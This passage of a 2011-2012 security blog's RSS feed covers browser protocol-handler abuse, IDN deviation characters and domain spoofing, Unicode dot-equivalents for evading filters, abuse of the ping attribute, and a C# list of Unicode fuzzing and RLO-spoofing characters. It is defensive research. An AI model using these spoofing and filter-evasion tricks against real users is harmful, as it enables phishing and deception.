&lt;p&gt;The primary spam protection is the infobar and requirement that a user must click 'yes' or 'no' to accept the registration or not.  The UI could easily be flooded with infobars in Chrome, which tiled them vertically, making the Web page completely unusable after the window filled up, as in the image below.&lt;/p&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-b2yMmLaTb4U/TybYWEbGCAI/AAAAAAAAAM8/5hlppHEbfX4/s1600/chrome-register-protocol-cascade.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="351" width="400" src="http://3.bp.blogspot.com/-b2yMmLaTb4U/TybYWEbGCAI/AAAAAAAAAM8/5hlppHEbfX4/s400/chrome-register-protocol-cascade.png" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;One could also create a really long title, which would overflow the UI so the user would only see one big button, and would likely have little idea about what to do other than click the big button.&lt;/p&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-YjKTu9JdkfU/TybYWcHnkfI/AAAAAAAAANE/ATY97KeYCBM/s1600/chrome-ui-overflow.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="172" width="400" src="http://1.bp.blogspot.com/-YjKTu9JdkfU/TybYWcHnkfI/AAAAAAAAANE/ATY97KeYCBM/s400/chrome-ui-overflow.png" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;Firefox and Opera both at least overlapped the infobars so you would only ever see one at a time.  Closing one would reveal the next one behind it.&lt;/p&gt; &lt;p&gt;It's also interesting to note how the registered protocol handlers would be stored.  Chrome was the only browser that registered handlers at the OS-layer, making them available to all applications.  In Windows this meant storing the registrations in the registry under the &lt;span style="font-family: 'Bitstream Vera Sans Mono', 'Courier New', 'Lucida Console', monospace, fixed;"&gt;HKEY_CLASSES_ROOT&lt;/span&gt; hive, which required administrative elevation to register.  In Ubuntu, they'd be stored in &lt;span style="font-family: 'Bitstream Vera Sans Mono', 'Courier New', 'Lucida Console', monospace, fixed;"&gt;~/.local/share/applications/mimeapps.list&lt;/span&gt;.  Opera stored registered protocol handlers in &lt;span style="font-family: 'Bitstream Vera Sans Mono', 'Courier New', 'Lucida Console', monospace, fixed;"&gt;C:\Users\chris\AppData\Roaming\Opera\Opera\handlers.ini&lt;/span&gt; where they were only available to Opera, and Firefox took the same approach, storing them in &lt;span style="font-family: 'Bitstream Vera Sans Mono', 'Courier New', 'Lucida Console', monospace, fixed;"&gt;C:\Users\chris\AppData\Roaming\Mozilla\Firefox\Profiles\wj7x1dmj.default\mimeTypes.rdf&lt;/span&gt; where they were actually mapped using the URN protocol.&lt;/p&gt; &lt;p&gt;Here's what a 'mailto' scheme registration looks like stored in Opera's handler.ini file:&lt;/p&gt;&lt;pre&gt;&lt;br /&gt;[mailto]&lt;br /&gt;Type=Protocol&lt;br /&gt;Handler&lt;br /&gt;Webhandler=http://www.lookout.net/?mail=%s&lt;br /&gt;Description=mailto scheme&lt;br /&gt;Flags=16&lt;br /&gt;&lt;/pre&gt; &lt;p&gt;And here's what some snippets of a 'foobar' scheme registration looks like stored in Firefox's mimeTypes.rdf file:&lt;/p&gt;&lt;pre&gt;&lt;br /&gt;&amp;lt;RDF:li RDF:resource=&amp;quot;urn:scheme:foobar&amp;quot;/&amp;gt;&lt;br /&gt;&amp;lt;RDF:Description RDF:about=&amp;quot;urn:handler:web:http://www.lookout.net/foobar=%s&amp;quot;&lt;br /&gt;                 NC:prettyName=&amp;quot;The foobar scheme&amp;quot;&lt;br /&gt;                 NC:uriTemplate=&amp;quot;http://www.lookout.net/foobar=%s&amp;quot; /&amp;gt;&lt;br /&gt;&amp;lt;RDF:Description RDF:about=&amp;quot;urn:scheme:foobar&amp;quot;&lt;br /&gt;                 NC:value=&amp;quot;foobar&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;NC:handlerProp RDF:resource=&amp;quot;urn:scheme:handler:foobar&amp;quot;/&amp;gt;&lt;br /&gt;&amp;lt;RDF:Description RDF:about=&amp;quot;urn:scheme:handler:foobar&amp;quot;&lt;br /&gt;                 NC:alwaysAsk=&amp;quot;true&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;NC:possibleApplication RDF:resource=&amp;quot;urn:handler:web:http://www.lookout.net/foobar=%s&amp;quot;/&amp;gt;&lt;br /&gt;&lt;/pre&gt; &lt;h2&gt;Further testing&lt;/h2&gt;&lt;p&gt;I tried clobbering some registration entries in Firefox using certain Unicode characters that would be best-fit mapped to ASCII. In other tests, some characters seem like they obviously should not be allowed in a scheme name, like control characters, for example, 0x09 and 0x01.  However, tests at using these combined with &lt;a href="http://shazzer.co.uk/vector/Characters-allowed-before-protocol-in-js-url"&gt;some Shazzer vectors for characters allowed before the javascript scheme name&lt;/a&gt; did not work.  While the registrations were allowed in Firefox, such as " javascript" with a leading SPACE, I believe some pre-processing removes that when encountered in an href attribute. &lt;/p&gt;&lt;p&gt;As far as penetration testing Web applications, we'll want to keep an eye out for usage of navigator.registerProtocolHandler, and closely inspect what the use case and implementation details might be.  For example, it makes sense that GMail or Hotmail would want to register the mailto handler to their URL.  Is that URL dynamically generated and can it be controlled by user-input?  If an attacker could for example inject the hostname part of the URL then they could cause some mischief, or at the least steal email addresses and other data present in the mailto link.  We'll also want to keep an eye out for registrations of web+foo schemes for similar issues including data ex-filtration and URL-control.  I'm sure other folks can think of more threats and abuse cases, if so please let me know!  Otherwise, time will tell.&lt;/p&gt; &lt;h2&gt;Risks to user-tracking and fingerprinting&lt;/h2&gt;&lt;p&gt;Another threat to consider is the way the web+ prefix would allow sites to set persistent unique identifiers in a user's Web browser.   This issue was brought up by James Hawkins, author of &lt;a href="http://dvcs.w3.org/hg/web-intents/raw-file/tip/spec/Overview.html"&gt;Web Intents draft&lt;/a&gt;, on the &lt;a href="http://lists.whatwg.org/htdig.cgi/whatwg-whatwg.org/2012-February/034881.html"&gt;WHATWG mailing list&lt;/a&gt;.  It also became evident to me during testing when I realized I could set a unique identifier through the web+ protocol scheme - something like web+[some_unique_id].  Sites (from any origin) could later use the isProtocolHandlerRegistered(scheme, url) to identify its visitors, and even track their movement across the Web.  As we've seen with trickery employed by advertising agencies in the past, those unique ids could be bundled and shared.  However, the isProtocolHandlerRegistered API was not implemented during testing so I could not confirm this. &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-507807102126684043?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/01/testing-registerprotocolhandler-and-web.html</link><author>noreply@blogger.com (Chris Weber)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-vqCAdpUphYc/TybYGiQKbrI/AAAAAAAAAMY/ritoua3mU14/s72-c/ui-confusion-opera.JPG' height='72' width='72'/><thr:total>0</thr:total><georss:featurename>Seattle, WA, USA</georss:featurename><georss:point>47.6062095 -122.3320708</georss:point><georss:box>47.520564 -122.4899993 47.691855 -122.1741423</georss:box></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-8716162821976944404</guid><pubDate>Fri, 08 Jul 2011 12:01:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.932-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>IDN</category><category domain='http://www.blogger.com/atom/ns#'>URI</category><category domain='http://www.blogger.com/atom/ns#'>IDNA</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>IDNA2003, IDNA2008, domain and sub-domain registrations during the
transitional period</title><description>To continue on with the discussion about &lt;a href="http://www.lookout.net/2011/06/30/the-risks-of-using-eszett-or-sharp-s-s-in-domain-names/"&gt;THE RISKS OF USING “ESZETT” OR “SHARP S” (“SS”) IN DOMAIN NAME&lt;/a&gt; - this character is just one of four deviation characters that will certainly cause mischief and mayhem in the coming years.  Here's the deal, the registries and registrars are moving from the initial specification that allowed Internationalized Domain Names (IDN) to be registered.  It was called IDNA and is now referred to as IDNA2003.  They're moving to the new specification which is called IDNA2008 although it didn't officially become a standard until the year 2010.  Hang with me this may actually affect you, whether your a registry like DENIC, a browser like Internet Explorer, a second-level registry like tumblr.com, or simply a customer who wants a domain name.&lt;br/&gt;&lt;br/&gt;There's a problem with these two specs - they're incompatible, and most of the risk here will be found during the "transitional period" when registries are upgrading.  That's on purpose mind you, and was deemed to be the best choice for the decades ahead of us.  Eventually we want to completely get rid of IDNA2003 and get the whole world on IDNA2008 - registries, Web browsers, anything that processes IDN's.&lt;br/&gt;&lt;br/&gt;A lot of characters will be handled differently under the new rules of IDNA2008.  Four characters in particular, called the &lt;a href="http://www.unicode.org/reports/tr46/#Deviations"&gt;deviation characters&lt;/a&gt;, are poised to cause mayhem during the transitional period as domain name registries shift to IDNA2008.  Why?  Because for a period of time domain names using these characters may actually resolve to two different IP addresses - depending on which IDNA rules the client/Web browser has implemented.&lt;br/&gt;&lt;br/&gt;But  just what is a &lt;a href="http://en.wikipedia.org/wiki/Domain_name_registry"&gt;domain name registry&lt;/a&gt; anyway?  To keep it simple, we can think of a registry as the overarching authority for a top-level-domain (TLD).  Most TLDs are well-known like .com, .net, and .org, and each has a single registry that enforces some rules and manages all domain name records.  This also ensures the same domain name can't be registered by more than one party.  Registrars on the other hand are sort of resellers, like Godaddy, Enom, and Dyndns who will sell the domain names to customers.  They still need to comply with the rules of the registry.&lt;br/&gt;&lt;br/&gt;But we can also think of some domains as their own second-level registries.  For example, blogspot.com, tumblr.com, smugmug.com each have millions of customers with their own domain name like &lt;a href="http://google.blogspot.com/"&gt;http://google.blogspot.com/&lt;/a&gt;.  In this way they're acting as registries providing subdomains, one per customer.  So all of these second-level registries will also be affected by IDNA's transitional period, if they decide to even offer IDNs in their subdomains - most don't currently.&lt;br/&gt;&lt;br/&gt;The four deviation characters are of particular concern, named so because how they're handled is different under IDNA2003 rules than they are under IDNA2008 rules:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;	&lt;li&gt;U+200C ZERO WIDTH NON-JOINER&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;U+200D ZERO WIDTH JOINER&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;U+00DF ( ß ) LATIN SMALL LETTER SHARP S&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;U+03C2 ( ς ) GREEK SMALL LETTER FINAL SIGMA&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;The two JOINERs get dropped under IDNA2003 but are valid in IDNA2008 under certain language contexts.  The "ß" maps to "ss" under IDNA2003 but does not map under IDNA2008, and the "ς" maps to "σ" under IDNA2003 but does not map under IDNA2008.   For a good visual of this &lt;a href="http://www.unicode.org/reports/tr46/#Deviations"&gt;see Table 1 of UTS46&lt;/a&gt;.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;What does it all mean?&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;In the end, if you currently have a domain containing "ss" or "σ" then you may want to register the domain using the new character supported under IDNA2008 if it suits your market.  That's not to say you should by any means, for example "&lt;a href="http://ssa.gov"&gt;ssa.gov&lt;/a&gt;" probably does not care to register "&lt;a href="http://ßa.gov"&gt;ßa.gov&lt;/a&gt;" since it's market is the United States.  But a German bank named "Gießen Savings and Loan" who currently owns &lt;a href="http://www.sparkasse-giessen.de"&gt;http://www.sparkasse-giessen.de&lt;/a&gt; will certainly want to register &lt;a href="http://www.sparkasse-gießen.de"&gt;http://www.sparkasse-gießen.de&lt;/a&gt;.&lt;br/&gt;&lt;br/&gt;As far as the JOINERs, that's a whole other story, but legitimate registrations should only be allowed for certain sequences of Arabic or Indic characters.  The use cases are limited to those, and registries will be required to implement those restrictions.  However, clients who perform IDNA2008 lookups are not required to implement those restrictions.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;Is my registry IDNA2008 enabled?&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;I don't know but I'd suggest checking with them.  DENIC decided not to implement the &lt;a href="http://www.unicode.org/reports/tr46/#Registries"&gt;bundling or blocking recommendations&lt;/a&gt; and instead gave their customers about 3 weeks to register the alternate domain that would resolve to them normally under IDNA2003 but not under IDNA2008.  Seems like a short period of time to me, if you were on vacation you might have missed the chance.  But the choice is up to the registry.  So check with your registrar or the registry to find out where they're at with their upgrade plans.&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-8716162821976944404?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/07/idna2003-idna2008-domain-and-sub-domain.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5662752881732653943</guid><pubDate>Thu, 30 Jun 2011 13:31:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.807-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>IDN</category><category domain='http://www.blogger.com/atom/ns#'>URI</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>The risks of using "Eszett" or "sharp s" ("ß") in domain names</title><description>With the transition from IDNA2003 to IDNA2008, there will be four characters that deviate in how they're handled.  Meaning that when they are used in a domain name, these characters will resolve to a different IP address under the rules of IDNA2003 than they do under the rules of IDNA2008.  On such character is the Latin small letter sharp s – also known as "Eszett" or "sharp s" ("ß") with code point U+00DF.  Registries have been advised to &lt;a href="http://unicode.org/reports/tr46/#Registries"&gt;implement bundling and blocking rules&lt;/a&gt; that would protect the registrants of domains with the character "ß" in them.  This would mean that an owner of &lt;a href="http://straße.de"&gt;http://straße.de&lt;/a&gt; would also be the guaranteed owner of &lt;a href="http://strasse.de"&gt;http://strasse.de&lt;/a&gt;.  However, some registries such as &lt;a href="http://www.denic.de/en/domains/internationalized-domain-names/sharp-s.html"&gt;DENIC &lt;/a&gt;are not implementing these measures as they move to IDNA2008.&lt;br/&gt;&lt;br/&gt;This means that when Alice goes to visit &lt;a href="http://straße.de"&gt;http://straße.de&lt;/a&gt; in her favorite browser that implements IDNA2008 she'll be taken to the domain she expects.  But when she visits the site at her friend's Bob house, using his browser that implements IDNA2003, she'll be taken to &lt;a href="http://strasse.de"&gt;http://strasse.de&lt;/a&gt; which could be a spoofing site.  In a scenario such as online banking this becomes a big deal.  And we can't possibly expect Alice and Bob to be aware of these incompatibilities can we?  Time will tell.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5662752881732653943?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/risks-of-using-or-s-in-domain-names.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-6147567918689742406</guid><pubDate>Tue, 28 Jun 2011 21:46:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.826-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>phishing</category><category domain='http://www.blogger.com/atom/ns#'>malware</category><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Many stops equal a U+002E full stop</title><description>In IDNA-aware (&lt;a href="http://tools.ietf.org/html/rfc3490#section-3.1"&gt;IDNA2003&lt;/a&gt;) applications, the "dot" character we see in domain names like www.example.com has several equals.  Specifically the following characters are all equivalent under IDNA rules:&lt;br/&gt;&lt;pre&gt;U+002E (full stop)&lt;br/&gt;U+3002 (ideographic full stop)&lt;br/&gt;U+FF0E (fullwidth full stop)&lt;br/&gt;U+FF61 (halfwidth ideographic full stop)&lt;/pre&gt;&lt;br/&gt;So the following Unicode strings are valid domain names and hyperlinks.  Note that what you see on the surface of the page content is what's in the anchor tag's href attribute.  By the time you hover your mouse over the link and even click it, the IDN-aware Web browser will have already normalized all the dot-equivalents to the U+002E full stop.  To see the test case, either copy the hyperlink using your browser's context menu (e.g. right click) or view the source of the page.&lt;br/&gt;&lt;pre&gt;&lt;a href="http://www.example.com"&gt;www.example.com&lt;/a&gt; U+002E (full stop)&lt;br/&gt;&lt;a href="http://www。example。com"&gt;www。example。com&lt;/a&gt; U+3002 (ideographic full stop)&lt;br/&gt;&lt;a href="http://www．example．com"&gt;www．example．com&lt;/a&gt; U+FF0E (fullwidth full stop)&lt;br/&gt;&lt;a href="http://www．example．com"&gt;www．example．com&lt;/a&gt; U+FF61 (halfwidth ideographic full stop)&lt;/pre&gt;&lt;br/&gt;There's actually a couple more bonus that equate to U+002E according to additional mapping rules:&lt;br/&gt;&lt;pre&gt;&lt;a href="http://www․example․com"&gt;www․example․com&lt;/a&gt; U+2024 (one dot leader)&lt;br/&gt;&lt;a href="http://www﹒example﹒com"&gt;www﹒example﹒com&lt;/a&gt; U+FE52 (small full stop)&lt;/pre&gt;&lt;br/&gt;Are there any IDNA-aware WAF's out there?  Has anyone seen this employed to bypass spam or phishing filters?&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-6147567918689742406?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/many-stops-equal-u002e-full-stop.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-2248016385171500638</guid><pubDate>Wed, 22 Jun 2011 13:57:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.624-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>ping</category><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>HTML</category><title>Abusing hyperlink auditing and the "ping" attribute in HTML</title><description>I just learned about this proposed feature of HTML which as &lt;a href="http://annevankesteren.nl/ "&gt;Anne van Kesteren&lt;/a&gt; noted is not in HTML5 at the moment but might be in HTML6.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.whatwg.org/specs/web-apps/current-work/multipage/links.html#hyperlink-auditing"&gt;http://www.whatwg.org/specs/web-apps/current-work/multipage/links.html#hyperlink-auditing&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;So "a" and "area" elements would support a "ping" attribute as a space-separated list of URIs that should contacted when the hyperlink is activated.  So someone clicks on the link and each of the URIs in the "ping" would receive an HTTP POST with the string "PING" in the body.  The request must also include either a "Referrer" header or a new "Ping-From" header which would include the same value.  This can obviously be useful for tracking purposes, and hopefully third-party sites could be easily (and by default) blocked rather than having an option to "selectively ignore URLs in the list (e.g. ignoring any third-party URLs)".&lt;br/&gt;&lt;br/&gt;I can imagine some other abuse cases here around flooding - e.g. the URL could easily by appended with junk causing large HTTP requests to get sent to an inordinately large list of URIs.&lt;br/&gt;&lt;br/&gt;Information could be leaked in the usual sense of Referrer/Ping-From leaks.  Anything else come to mind?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-2248016385171500638?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/abusing-hyperlink-auditing-and.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-3585185166237218636</guid><pubDate>Mon, 20 Jun 2011 19:41:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.693-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>URI</category><title>Some browsers convert pipe "|" to colon ":" in the file scheme</title><description>I just thought this was odd, and may be exploited in cases where a security filter checks the string before the conversion takes place.&lt;br/&gt;&lt;br/&gt;Here are the results of the DOM parsing for &lt;a href="file://c|/foo/bar"&gt;"file://c|/foo/bar"&lt;/a&gt;.  Internet Explorer and Google Chrome both convert the "|" to the ":" in the path component.  &lt;a href="http://en.wikipedia.org/wiki/File_protocol#Windows_2"&gt;Windows actually treats the "|" as a ":" in the path&lt;/a&gt;, which may also seem odd, but then why would these browsers feel the need to convert the character?&lt;br/&gt;&lt;br/&gt;Test Case&lt;br/&gt;================&lt;br/&gt;&lt;br/&gt;&lt;a href="file://c|/foo/bar"&gt;file://c|/foo/bar&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;Results&lt;br/&gt;================&lt;br/&gt;&lt;br/&gt;&lt;em&gt;&lt;strong&gt;RawUrl                                           Browser &lt;/strong&gt;&lt;/em&gt;&lt;br/&gt;file:///c:/foo/bar                        MSIE 7.0&lt;br/&gt;file:///C:/foo/bar                       Chrome/12.0.742.100&lt;br/&gt;file:///c|/foo/bar                       Firefox/4.0.1&lt;br/&gt;file://c|/foo/bar                         Safari/5.05&lt;br/&gt;file://localhost/c|/foo/bar    Opera/9.80&lt;br/&gt;&lt;br/&gt;I can understand being liberal in accepting "|" characters in the path  segment, even though RFC3986 and 3987bis would have you percent-encode it  to "%7C".  But I didn't realize that IE and Chrome would actually  perform a transformation on the input in this way.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-3585185166237218636?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/some-browsers-convert-pipe-to-colon-in.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>5</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-2968082149280318858</guid><pubDate>Thu, 02 Jun 2011 23:00:00 +0000</pubDate><atom:updated>2012-02-20T16:36:10.901-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>BOM</category><category domain='http://www.blogger.com/atom/ns#'>RLO</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Special Unicode characters for testing, fuzzing, and controllingthe visual display of text</title><description>&lt;strong&gt;WARNING&lt;/strong&gt;: Some of these characters may cause strange things to happen in your software.&lt;br/&gt;&lt;br/&gt;Of course, that's the point right?  Here's a minimal set of special Unicode characters I like to use in application testing.  This bit is from a small Unicode generation library I use for a fetching things like:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt; &lt;li&gt;best fit mappings&lt;/li&gt;&lt;br/&gt; &lt;li&gt;Unicode normalization mappings&lt;/li&gt;&lt;br/&gt; &lt;li&gt;ill-formed byte sequences&lt;/li&gt;&lt;br/&gt; &lt;li&gt;overlong-utf8&lt;/li&gt;&lt;br/&gt; &lt;li&gt;non-characters&lt;/li&gt;&lt;br/&gt; &lt;li&gt;private use area (PUA)&lt;/li&gt;&lt;br/&gt; &lt;li&gt;unassigned code points&lt;/li&gt;&lt;br/&gt; &lt;li&gt;code points with special meaning such as the BOM and RLO&lt;/li&gt;&lt;br/&gt; &lt;li&gt;half-surrogate values&lt;/li&gt;&lt;br/&gt; &lt;li&gt;invisible characters&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;Some of these (the RLO and MVS) are useful for visual spoofing or controlling the visual appearance of text in modal dialog boxes or other user-controlled content.  For example, through the RLO character in the middle of a string to switch the reading order so the characters run right-to-left.  Like so:&lt;br/&gt;&lt;br/&gt;The site www.example.com‮‮ is known to host malware, continue?&lt;br/&gt;&lt;br/&gt;A lame example I know but the point is as a software developer you should never let the override characters into your code.  Other characters have caused weird (often exploitable) errors in Web applications, Web browsers, Web servers and other software I've come across.  For example, if an ASP.NET application is passing user-controlled input to a StreamWriter it will enter an irrecoverable error condition leading to a permanent (until restarted) &lt;a href="http://blogs.msdn.com/bclteam/archive/2005/03/15/396389.aspx"&gt;denial of service when an illegal surrogate&lt;/a&gt; (a single low surrogate without a matching high or vice versa) is encountered.&lt;br/&gt;&lt;br/&gt;&lt;code&gt; /// The Byte Order Mark U+FEFF is a special character defining the byte order and endianess&lt;br/&gt;/// of text data.&lt;br/&gt;/// &lt;/code&gt;&lt;code&gt;&lt;br/&gt;public static readonly string uBOM = "\uFEFF";&lt;br/&gt;///&lt;br/&gt;/// The Right to Left Override U+202E defines special meaning to re-order the&lt;br/&gt;/// display of text for right-to-left reading.&lt;br/&gt;///&lt;br/&gt;public static readonly string uRLO = "\u202E";&lt;br/&gt;///&lt;br/&gt;/// Mongolian Vowel Separator U+180E is invisible and has the whitespace property.&lt;br/&gt;///&lt;br/&gt;public static readonly string uMVS = "\u180E";&lt;br/&gt;///&lt;br/&gt;/// Word Joiner U+2060 is an invisible zero-width character.&lt;br/&gt;///&lt;br/&gt;public static readonly string uWordJoiner = "\u2060";&lt;br/&gt;///&lt;br/&gt;/// A reserved code point U+FEFE&lt;br/&gt;///&lt;br/&gt;public static readonly string uReservedCodePoint = "\uFEFE";&lt;br/&gt;///&lt;br/&gt;/// The code point U+FFFF is guaranteed to not be a Unicode character at all&lt;br/&gt;///&lt;br/&gt;public static readonly string uNotACharacter = "\uFFFF";&lt;br/&gt;///&lt;br/&gt;/// An unassigned code point U+0FED&lt;br/&gt;///&lt;br/&gt;public static readonly string uUnassigned = "\u0FED";&lt;br/&gt;///&lt;br/&gt;///  An illegal low half-surrogate U+DEAD&lt;br/&gt;///&lt;br/&gt;public static readonly string uDEAD = "\uDEAD";&lt;br/&gt;///&lt;br/&gt;/// An illegal high half-surrogate U+DAAD&lt;br/&gt;///&lt;br/&gt;public static readonly string uDAAD = "\uDAAD";&lt;br/&gt;///&lt;br/&gt;/// A Private Use Area code point U+F8FF which Apple happens to use for its logo.&lt;br/&gt;///&lt;br/&gt;public static readonly string uPrivate = "\uF8FF";&lt;br/&gt;///&lt;br/&gt;/// U+FF0F FULLWIDTH SOLIDUS should normalize to / in a hostname&lt;br/&gt;///&lt;br/&gt;public static readonly string uFullwidthSolidus = "\uFF0F";&lt;br/&gt;///&lt;br/&gt;/// Code point with a numerical mapping and value U+1D7D6 MATHEMATICAL BOLD DIGIT EIGHT&lt;br/&gt;///&lt;br/&gt;public static readonly string uBoldEight = char.ConvertFromUtf32(0x1D7D6);&lt;br/&gt;///&lt;br/&gt;/// IDNA2003/2008 Deviant - U+00DF normalizes to "ss" during IDNA2003's mapping phase,&lt;br/&gt;/// different from its IDNA2008 mapping.&lt;br/&gt;/// See http://www.unicode.org/reports/tr46/&lt;br/&gt;///&lt;br/&gt;public static readonly string uIdnaSs = "\u00DF";&lt;br/&gt;///&lt;br/&gt;/// U+FDFD expands by 11x (UTF-8) and 18x (UTF-16) under NFKC/NFKC&lt;br/&gt;///&lt;br/&gt;public static readonly string uFDFA = "\uFDFA";&lt;br/&gt;///&lt;br/&gt;/// U+0390 expands by 3x (UTF-8) under NFD&lt;br/&gt;///&lt;br/&gt;public static readonly string u0390 = "\u0390";&lt;br/&gt;///&lt;br/&gt;/// U+1F82 expands by 4x (UTF-16) under NFD&lt;br/&gt;///&lt;br/&gt;public static readonly string u1F82 = "\u1F82";&lt;br/&gt;///&lt;br/&gt;/// U+FB2C expands by 3x (UTF-16) under NFC&lt;br/&gt;///&lt;br/&gt;public static readonly string uFB2C = "\uFB2C";&lt;br/&gt;///&lt;br/&gt;/// U+1D160 expands by 3x (UTF-8) under NFC&lt;br/&gt;///&lt;br/&gt;public static readonly string u1D160 = char.ConvertFromUtf32(0x1D160);&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-2968082149280318858?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/06/special-unicode-characters-for-error.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-3606848082126858505</guid><pubDate>Fri, 27 May 2011 23:15:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.697-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Web</category><category domain='http://www.blogger.com/atom/ns#'>SSL</category><category domain='http://www.blogger.com/atom/ns#'>TLS</category><category domain='http://www.blogger.com/atom/ns#'>security</category><title>How Web browsers display a standard SSL connection compared with an
EVSSL connection</title><description>Secure Sockets Layer (SSL) is a peer to peer (or client to server) communication protocol designed to encrypt the data being transmitted between two computers over the Internet.  This protects the data from "man-in-the-middle" attacks where a third computer could eavesdrop on the conversation and not only read the data but also modify it in transit.  SSL is certainly one of the earliest security protection added to Web browsers and after several revisions has led to its successor the Transport Layer Security (TLS) protocol.  To use SSL, a webmaster much purchase a certificate from a Certificate Authority and install it on their Web server.  When visiting the site, a Web browser will read the sever's certificate and use its key information to set up an encrypted connection between the browser and the server.&lt;br/&gt;&lt;br/&gt;Each of the most popular modern Web browsers notifies end users that SSL is active through the use of special icons, colors, or other visual notifiers added to the browser chrome that make it clear something good is happening.  In fact the display if quite different depending on the *type* of SSL certificate purchased and used on the site.  The prominent Extended Validation (EVSSL) certificate obviously gets the best branding currently.  Use of an EVSSL certificate will often be presented with colorful green indicators in the Web browser, a sure sign that something even better is happening, right?&lt;br/&gt;&lt;br/&gt;Unfortunately each browser presents this information in a different and sometimes confusing way.  To add to the fragmentation, many browsers have a history of changing even their own presentation habits for SSL.  Perhaps that factor is just a product evolution from years of user feedback and usability testing, but modifying significant design elements does change the game for better or worse.  Here's a look at how the following browsers display an active and error-free SSL connection to the end user.&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;	&lt;li&gt;Internet Explorer 9&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Internet Explorer 8&lt;/li&gt;&lt;br/&gt;	